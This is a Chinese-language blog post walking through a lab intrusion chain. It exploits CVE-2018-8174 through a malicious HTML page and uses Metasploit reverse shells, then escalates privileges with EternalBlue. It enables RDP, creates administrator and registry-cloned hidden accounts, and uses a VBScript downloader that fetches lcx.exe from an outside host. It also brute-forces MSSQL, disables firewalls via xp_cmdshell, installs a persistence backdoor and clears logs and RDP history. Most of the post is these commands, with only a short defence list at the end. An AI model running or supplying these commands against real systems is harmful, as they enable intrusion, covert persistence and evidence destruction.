ssrf漏洞内网渗透_CVE20188174漏洞复现及内网渗透攻击

最新推荐文章于 2023-02-03 17:49:24 发布
最新推荐文章于 2023-02-03 17:49:24 发布
阅读量657 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39907922/article/details/111674065
版权

5f75390fb3319bb4bdb12f4bb249809d.gif

本文涉及的知识点: CVE-2018-8174漏洞复现内网渗透权限维持脚本编程痕迹清除端口转发利用MS17-010提权

CVE-2018-8174漏洞简介

CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。在基于Web的攻击情形中,攻击者能通过Internet Explorer利用此漏洞的特定网站,然后诱使用户查看该网站。攻击者还可以在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“安全初始化”的ActiveX控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。

Persistence后门

Persistence是一款使用安装自启动方式的持久性后门程序,读者可以利用  它创建注册和文件。
参数解释:

  • A: 自动启动Payload程序

  • S: 系统启动时自动加载

  • U: 用户登录时自动启动

  • X: 开机时自动加载

  • i: 回连的时间间隔

  • P: 监听反向连接端口号

  • r: 目标机器IP地址

环境搭建

拓扑图

21989211250552bf426628c5ecd13189.png

Win server 2008 对Windows 7开启1433端口

  1. 选择“打开或者关闭Windows防火墙”把防火墙打开,然后选择“高级设置”,选择“创建规则”来指定端口。

  1. 在“入站规则”里选择刚才创建的规则,名称是“1433”,如下图所示

1aa77beb27e3a5ac93b5da5f48cde2c4.png

3.在属性对话框中,选择“远程IP地址”时,使用Windows7 的IP地址:172.20.10.177,配置完成后,Win server 2008 对Windows7成功开启1433端口

06e9482e454e82a0bb4e2d91febb984a.png

内网攻击过程

1号机获得2号机的权限

利用CVE-2018-8174漏洞获取2号机(Windows 7)权限,添加攻击者用户

  1. 从github上克隆CVE-2018-8174的EXP到Kali Linuxgit clone https://github.com/iBearcat/CVE-2018-8174_EXP.git

1d75ec5791be8b7b5598a236fb0c5a0c.png

2.生成恶意html和rtf文件cd CVE-2018-8174_EXP/

python CVE-2018-8174.py -u http://192.168.114.130/exploit.html -o exploit.rtf -i 192.168.114.130 -p 4444

44ab4e5a30ded7c41363d274eef58c46.png

3.将恶意html文件移动到网站根目录,启动apache2服务

cp exploit.html /var/www/html/
service apache2 start

4c618794802556433a75e8ee1882766b.png

4.新打开一个终端,生成MSF监听

msfconsole -x "use exploit/multi/handler; set PAYLOAD Windows/shell/reverse_tcp; set LHOST 192.168.114.130; set lport 4444; run"

a4b513a296145e608c7f33eda8debd68.png

5.受害者点击恶意链接

7c50ef112dc3bcaf0c9bb076e7165ba3.png

  1. 在kali里接收到了shell,可在meterpreter中管理shell
    发现非管理员权限

6a44c433402a56f29b78ec6987b780a2.png

ee57d67311e97bb8143da524a774e0fc.png

7.使用MS17-010模块进行提权
use auxiliary/scanner/smb/smb_ms17_010

2ff96789324190a3d8587ff7680effbf.png

在运行该模块之前,需要设置相关选项,我们使用show options查看配   置信息

6b464cd7e5b9b1afa003d8273bdea425.png

  1. 需要设置目标地址,设置命令:set RHOSTS 192.168.114.138

    b4d94c77a992a620e580fa627e68a59e.png

9.设置完成后,执行run或exploit命令,等待执行结果,发现存在永恒之蓝漏洞

5c210bad5e8d511a51a04733b3b78b01.png

10.使用漏洞利用模块

use exploit/Windows/smb/ms17_010_eternalblue

c7048023429229067b6e3a80f05ef24e.png

11.查看配置信息,并设置标记为yes的属性,show options,目标机host   地址:192.168.114.138,set RHOST 192.168.114.138

0768b4783cd647e35ab02fed33895974.png

  1. 选择载荷payload,也就是shellcode,此处我们选择回连至控制端   shell的payload

set payload  Windows/x64/meterpreter/reverse_tcp

1b40888652a8e1d97eac3a746395a94d.png

同样,载荷也需要进行配置,show options查看配置信息
配置中缺少本地主机 LHOST,设置一下

set LHOST 192.168.114.130

0e8e4316051f42a349ca555f9bc4f1da.png

aa38cf53eb39104cd6795de9b1187c88.png

13.完成配置后,运行exploit或者run,开始执行漏洞利用模块
成功获取来自目标主机的Session会话

1690536fd5c7629c012adf5073ecf9f9.png

14.查看受害者机器相关信息

2e79f7ef3458e38f5caee9098bfcce7c.png

15.成功使用MS17010获得系统权限

02989e023433c3d942b70afe7f7c1834.png

16.发现未开启3389端口

e7cab5bf6efa47631f8c6c04a4a51798.png

17.添加3389入站规则

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP  dir=in localport=3389 action=allow

96480fde76da1dbef04e0753ae45cd8d.png

18.开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server     /v fDenyTSConnections

6793b4f7d4f1eafed217dac43580702a.png

19.成功打开3389端口

a7a082ad2a0167148de3974d6b39c314.png

20.创建管理员用户Waldo

net user Waldo 123456hhhh. /add

net localgroup administrators Waldo /add

f917241c10f9cd4a0cf7cfb00a2e623f.png

21使用Waldo账户远程登录portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 192.168.114.138

6e8500a34f591db911b9b1144b7d9348.png

rdesktop  127.0.0.1 -u Waldo -p 123456hhhh.

698d6b8de9c9395f947dc40069bebfaf.png

添加超级隐藏管理员账户

net user test$ 123456 /add

net localgroup administrators test$ /add

6d2d6714750789e8a2bc9b7f3d534fe7.png

但在管理账户面板依然能够看见,下面要解决这个问题

4bffa008adc5505572321699e643cc12.png

在注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names下找  到新建的帐户test$

获取默认类型为0x3ec,将注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$导出为1.reg

在注册表下能够找到对应类型名称的注册表项    HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EC

9a0c0cc06ae6823b741d5fd1fbaa3b6b.png

右键将该键导出为2.reg,保存的文件信息如下图

76afcadafb6d131987ff8ef8be9eaede.png

默认情况下,管理员帐户Administrator对应的注册表键值为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
同样,右键将该键导出为3.reg

将注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA下键F的值替换为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4下键F的值,即2.reg中键F的值替换成3.reg中键F的值

替换后,如图

4e4b6721670010da72e3419ea80d0ae6.png

命令行删除特殊账户: net user test$ /del

导入reg文件:

regedit /s 1.reg

regedit /s 2.reg

隐藏账户制做完成,控制面板不存在帐户test$

通过net user无法列出该帐户
计算机管理-本地用户和组-用户也无法列出该帐户
但可通过如下方式查看: net user test$

c7cf07c51fb47b1423680c1b03008aad.png

命令窗口打开后,键入net user test$/active:yes。输完后按一下回车键看到“命令成功完成”信息即表明超级隐藏账户test$ 账户已启用

端口转发:portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 192.168.114.138

使用超级隐藏账户登录:rdesktop 127.0.0.1 -u test$ -p 123456

834f216a8668b995275ca801f1432cd7.png

Windows 不会显示隐藏账户

907a2a5143c5ab55715e02a4e416f5bb.png

使用vbs脚本上传SQLTOOLS.exe

脚本如下:

url = "http://wjs001.cn/lcx.exe"    '网络上的文件地址saveas = "c:\lcx.exe"                '保存成的本地文件Set xmlhttp = CreateObject("Microsoft.XMLHTTP") '创建HTTP请求对象Set stream = CreateObject("ADODB.Stream")       '创建ADO数据流对象Call xmlhttp.open("GET",url,False)'打开连接Call xmlhttp.send()'发送请求stream.mode = 3 '设置数据流为读写模式stream.type = 1     '设置数据流为二进制模式Call stream.open()'打开数据流Call stream.write(xmlhttp.responsebody)'将服务器的返回报文主体内容写入数据流Call stream.savetofile(saveas,2)'将数据流保存为文件'释放对象Set xmlhttp = NothingSet stream = Nothing

在shell下,创建文件夹: mkdir C:\\hack\\

将脚本上传到创建好的名为hack的文件夹下:

meterpreter > upload /root/down1.vps  C:\\hack

ae824e94415c33a9d30c3696bab7c47d.png

查看C:\hack确认上传成功:

2b42e115c81d6b25d7cb0275a7e816c6.png

运行cscript down1.vbs,上传SQLTOOLS软件:

1f9ddd4f7d9cae790701b21ba263493d.png

Kali对Windows 7(192.168.114.138)的权限维持见**权限维持**模块

从Windows 7进攻Windows server 2008

对Windws server 2008的sa账户进行爆破

  1. 使用nmap扫描发现172.20.10.208开了1433端口

nmap -p1433 --open 172.20.10.0/24

c0570ae50b0a3d2170c84c012ae7df86.png

  1. 使用ms-sql-brute模块对Win server 2008的sa账户进行爆破,获得用户名为sa,密码为123456

name.txt和password.txt是爆破用的字典

nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo\Desktop\name.txt,passdb

ea98f2a910113f7bdd64b5dc0dd841e9.png

利用sqltoos获取Win server 2008 的权限

  1. 使用sqltools进行sql连接

33011143f64f204da7410a08b6d4e98b.png

2.用xp_cmdshell关闭防火墙限制

netsh firewall set opmode mode=disable

513ff70e9e3da533a255cb4df34aee12.png

3.添加3389入站规则

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=

8158f7d7a8d027e82e81eba658c3520c.png

4.开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DW

7c4513cf4716568b6df491ce523f4fa9.png

8213e8ce37f0b5d7ff4406b9574eb1de.png

  1. 创建管理员用户Waldo6TEST

net user Waldo2008 1234567hhhh. /add

net localgroup administrators Waldo2008 /add

8710ca98edc7af3390ea92c503214e52.png

db74c4b7f63645c487f89bf59f64b17e.png

Windows 7中远程登录Win server 2008

1,在Windows 7 使用用户名Wado2008T 密码1234567hhhh.成功登陆Win server 2008

eac563a0fc50beb1061014bc33fde9e6.png

权限维持(Kali到Windows7)

run persistence -X -i 5 -p 1121 -r 192.168.114.130,这里在Meterpreter会话中运行persistence后渗透攻击模块,在目标主

机的注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run添加下图中倒数第一个[*],达到自启动的目的,-X参数指定启动的方式为开机自启动,-i参数指定反向连接的时间间隔

923ddd35ddd7d4750eb44ac39a20bafd.png

然后建立Meterpreter的客户端,在指定回来的1121端口进行监听,待Windows 7(192.168.114.138),等待后门重新连接,具体操作命令如下:

msfconsole 
use exploit/multi/handlerset PAYLOAD Windows/meterpreter/reverse_tcpset LHOST 192.168.114.130set lport 1121run

4f371e061cd073fa6583cd36cd94f955.png

痕迹清除

使用清除远程连接历史记录的BAT脚本

3e7de59643cccb9a309a0509e4168045.png

6a14da074bd280972255343e31575a77.png

e9db9265931673706221e5f84281cc0a.png

clearev命令

未清除时Windows 7(192.168.114.138)中的日志

a51ee778a6f331a5ccfed89bb58968b1.png

9101057372bdbf490927ff004d469c8a.png

4b7aaf833b68a5fed0efb64ac17c67fa.png

脚本分析

目标机器下载程序的vbs脚本

注: 使用service apache2 start将kali linux apache2服务打开,可以使之充当服务器,将需要上传的文件放在/var/www/html目录下

url = "http://192.168.114.130/SQL.exe"    '网络上的文件地址saveas = "C:\hack\SQL.exe"                '保存成的本地文件Set xmlhttp = CreateObject("Microsoft.XMLHTTP") '创建HTTP请求对象Set stream = CreateObject("ADODB.Stream")       '创建ADO数据流对象Call xmlhttp.open("GET",url,False)'打开连接Call xmlhttp.send()'发送请求stream.mode = 3 '设置数据流为读写模式stream.type = 1     '设置数据流为二进制模式Call stream.open()'打开数据流Call stream.write(xmlhttp.responsebody)'将服务器的返回报文主体内容写入数据流Call stream.savetofile(saveas,2)'将数据流保存为文件'释放对象Set xmlhttp = NothingSet stream = Nothing

清除3389远程桌面连接记录的批处理脚本

@cls ::清屏
home.php?mod=space&uid=65712 0b ::设置默认的控制台前景和背景颜色
::REM清除mstsc历史记录echo off ::echo off执行以后,后面所有的命令均不显示,但本条命令是显示的
mstsc
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /f 
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /fcd /d %USERPROFILE%del *.rdp /a/s

解释:
/f: 不提示
/a: 删除隐藏文件

如何防御

1.不要打开任何来源不明的链接或Office文档

2.及时更新并安装微软发布的最新补丁

3.定期查看日志和管理用户界面

4.及时更新杀毒软件,并对计算机进行杀毒

bd09c947d61c8e5ad94603a57d8c47ff.gif

weixin_39907922
关注
Ivanti Connect Secure SSRF to RCE漏洞复现(CVE-2024-21893)
iSee857的博客
10-12 550
CVE-2024-21893 是存在 Ivanti Connect Secure SAML 组件中的 SSRF 漏洞,该漏洞主要是由于使用存在漏洞第三方库,并且第三方库没有及时的更新导致的,可以绕过 CVE-2024-21887 命令注入漏洞的补丁,达到未授权 RCE 的目的。是一款企业级远程访问解决方案,提供安全远程访问(VPN)、多因素认证等功能。,包括验证用户、验证设备、控制访问和保护数据。它适用于混合IT时代,支持多种应用场景,如员工远程接入、浏览器访问内网应用、dnslog检测poc。
IE双杀漏洞复现(CVE-2018-8174)
谢公子的博客
09-09 2156
目录 CVE-2018-8174双杀漏洞复现一(不稳定) 下载payload MSF监听 CVE-2018-8174双杀漏洞复现二 生成payload MSF监听 派生给CS 双杀漏洞攻击是一种新型的IE浏览器0day漏洞和新型Office文档漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全...
从web到内网渗透经过哪些流程,这次漏洞复现全明白了
weixin_59086772的博客
08-24 481
雨笋教育小编来给大家分享干货了,由于最近某SRC开启众测福利,所以咱就跟着挖个洞,写篇文章,一举两得。(厚码见谅)嘿嘿 渗透开始 WEB撕口子: Web方面的突破口是一个OA系统 致远OA嘛大家都知道,网上复现教程也特别多所以就不在多啰嗦了直接上EXP利用,(工具是本人自己写的哈),地址是各OA-EXP 传完马子冰蝎连接准备后续操作 到这里本想添加个用户直接远程登陆服务器了,但是遇到了点问题远程桌面没开启(也可能是换了端口) 然后我们试着找找...
CVE-2018-8174(IE浏览器远程代码执行漏洞)
94小菜
11-29 825
漏洞描述: VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。      在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet Exp
【渗透测试】Drupal 漏洞 CVE-2018-7600 远程代码执行-复现
SunnyCat
01-11 9973
Drupal 漏洞 CVE-2018-7600 远程代码执行-复现 漏洞简介: Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 漏洞原理: drupal的注册页面,当我们提交的数据有问题时,它
悬镜安全强烈推荐丨内网安全检查/渗透总结,先收藏再说
Anprou的博客
07-06 6468
浏览文章的时候,能够看到一篇干货满满的文章,实属不易,能够把内网安全渗透测试的整个阶段所涉及到的信息整理的如何全面也是值得佩服,废话不多说,直接上文章。本篇文章首发平台先知社区,如需转载,请标注来源。阅读本篇文章大约需要15分钟,建议先收藏,慢慢看。修订记录编号日期修订内容12018.5.18初稿A2B2C2A3B3C31. 内网安全检查/渗透介绍1.1 攻击思路有2种思路:攻击外网服务器,获取外...
内网攻击域渗透学习(笔记)
p_utao的博客
11-27 1439
信息收集 有了内网的第一台机器的权限后,就到了很关键的一步信息收集,它也是内网渗透中不可或缺的一部分。 查看当前机器的网络环境,收集域里的相关信息,包括所有的用户、所有的计算机,以及相关关键组的信息。 net user/domain:查看域用户 net view/domain:查看有几个域 net view/domain:xxx:查看域内的主机 net group/domain:查看域里面的组 net group "domain computers" /domain:查看域内所有的主机名 net group
Weblogic_SSRF漏洞_CVE-2014-4210(未完待续)
simonnews的博客
05-25 919
Weblogic_SSRF漏洞_CVE-2014-42101 漏洞概述1.1 基础知识1.2 漏洞概述1.3 影响版本2 漏洞原理分析3 漏洞复现4 漏洞修复5 其他 1 漏洞概述 1.1 基础知识 什么是SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 1.2 漏洞
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。本文将详细介绍WebLogic SSRF的工作原理、攻击案例以及CVE-...
SSRF漏洞复现
cxrpty的博客
02-26 2193
实验环境:Ubuntu虚拟机上安装vulhub漏洞环境 实验原理:由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 实验步骤: 1.进入vulhub-master/weblogic/ssrf目录,输入docker-compose up -d启动环境 2.输入ifconfig查看ip ...
CVE-2021-26855 Exchange Server SSRF致RCE漏洞复现
m0_56642842的博客
08-05 783
0x00 简介 Exchange Server 是Mirosoft的一个消息与协作系统,可以用来构架用于企业或学校的邮件系统或免费邮件系统。它提供了包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理实时会议和工作流等丰富的协作应用,而所有应用支持Internet浏览器来访问。 0x01 漏洞概况 该漏洞可在Exchange中构造SSRF漏洞攻击者可以利用该漏洞构造任意HTTP请求并绕过EXchange Server身份验证,从而利用该漏洞窃取用户邮箱中的内容或进行内网探测。 0x02 影响版本
SSRF漏洞分析与实践笔记
lm19770429的专栏
09-14 401
SSRF简介 SSRF(Server-Side Request Forgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。 由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。 2. SSRF形成原因 大都是由于服务端提供了从其它服务器获取数据的功能,比如使用户从指定的URL web应用获取图片、下载文件、读取文件内容等。但又没有对目标地址做严格过滤与限制,导...
内网渗透-SSRF漏洞
小刚的博客
08-19 1318
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 SSRF漏洞SSRF产生原因利用方式小案例1.请求内网资源2.端口扫描3.读取源文件4.Gopher://协议进行扩展攻击5.漏洞组合利用挖掘技巧1.传参方面2.web服务方面3.审计方面防御措施 SSRF SSRF服务器端请求伪造, 全英文Service_side Request Forgery 一般人也记不住 主要利用漏洞来伪造成服务器端发起请求,比如绕过防火墙,进行内网探测,能够突破客户端获.
CVE-2018-8174
weixin_51706044的博客
09-28 2099
漏洞描述: CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码 操作 这里是先创建的CVE文件 克隆的命
实战 | SSRF攻击内网的实战案例
weixin_43167326的博客
02-03 1049
推荐查看: 实战 | 记一次SSRF攻击内网的实战案例 实战 | 记两次应急响应小记 干货 | Wordpress网站渗透方法指南 实战 | 记一次CTF题引发的0day挖掘 2023年零基础+进阶系统化白帽黑客学习 实战 | 记一次邮件系统C段引发的SQL手注和内网渗透
ssrf漏洞内网渗透_SSRF
weixin_39856630的博客
12-05 1305
一、SSRF是什么?如何产生的?危害有哪些?SSRF是攻击者利用服务端A的漏洞,利用服务端A的身份,发起对服务端A本身,或者服务端B的攻击请求。http://www.aaaaa.com/ssrf.php?url=http://www.bbbbb.com如上就是一个标准的ssrf漏洞,当攻击者点击这个链接时,相当于攻击者利用aaaaa访问了bbbbb。攻击者——有漏洞的服务器A——服务器A...
CVE-2018-8174 IE浏览器远程代码执行漏洞
玄道的网安博客
11-03 6024
0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.com/vulnerable/11441.html CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞 CVE地址:http://cve.mitre.org/cgi-bin/...
Exchange漏洞分析:SSRF RCE
Galaxy_0的博客
01-10 537
Exchange漏洞分析:SSRF RCE
CVE-2018-8174漏洞两种姿势的复现
热门推荐
qq_39627497的博客
12-06 1万+
CVE-2018-8174漏洞两种姿势的复现 CVE-2018-8174漏洞两种姿势的复现 漏洞介绍: 该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174复现过程1: 1、...
ssrf漏洞内网渗透_ssrf漏洞分析
最新发布
06-06
内网渗透中,SSRF 漏洞可以用来发起内网扫描、访问内部系统等攻击。通常情况下,攻击者会构造恶意请求,将目标网站的请求地址改为内部 IP 或者域名,从而让服务器发起请求,从而得到内部系统的信息。 下面是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值